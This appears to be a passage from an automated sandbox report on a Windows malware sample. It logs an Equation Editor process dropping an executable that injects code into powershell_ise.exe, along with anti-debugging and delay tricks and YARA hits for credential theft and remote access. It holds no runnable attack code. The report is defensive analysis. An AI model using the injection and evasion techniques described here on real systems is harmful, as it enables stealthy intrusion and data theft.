Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2704 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe TID: 948 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe TID: 2168 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: EQNEDT32.EXE Binary or memory string: 2fhpwWhMzjGGhXHCBPqBT8Ei3z3FkNlhlTNT0KIVi4hgFSqX8fo3TEXqTOtYFYDVy3zW7FoA6fY57dub9xwiMyD8dpsjQy7ApwykvJ8eJ5FEz5NgOodxlNAsgqNYuhOyVdiw5YAEUpBuVqB31kHYMTHMlxqnMlxD8ictG0pBnRluKwCzCKIHnHTr4idFSAg9sf6M7h2nNSO06QMl435wireejcCgpxU6u3Z8IefLPPTzUIYgnT4HoDi1uEut9BIJMOQz
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_038A8C90 mov edx, dword ptr fs:[00000030h] 2_2_038A8C90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 402000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 436000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 438000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 7EFDE008 Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Memory allocated: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 536 Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Queries volume information: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe VolumeInformation Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe PID: 2912, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell_ise.exe PID: 304, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe PID: 2912, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell_ise.exe PID: 304, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs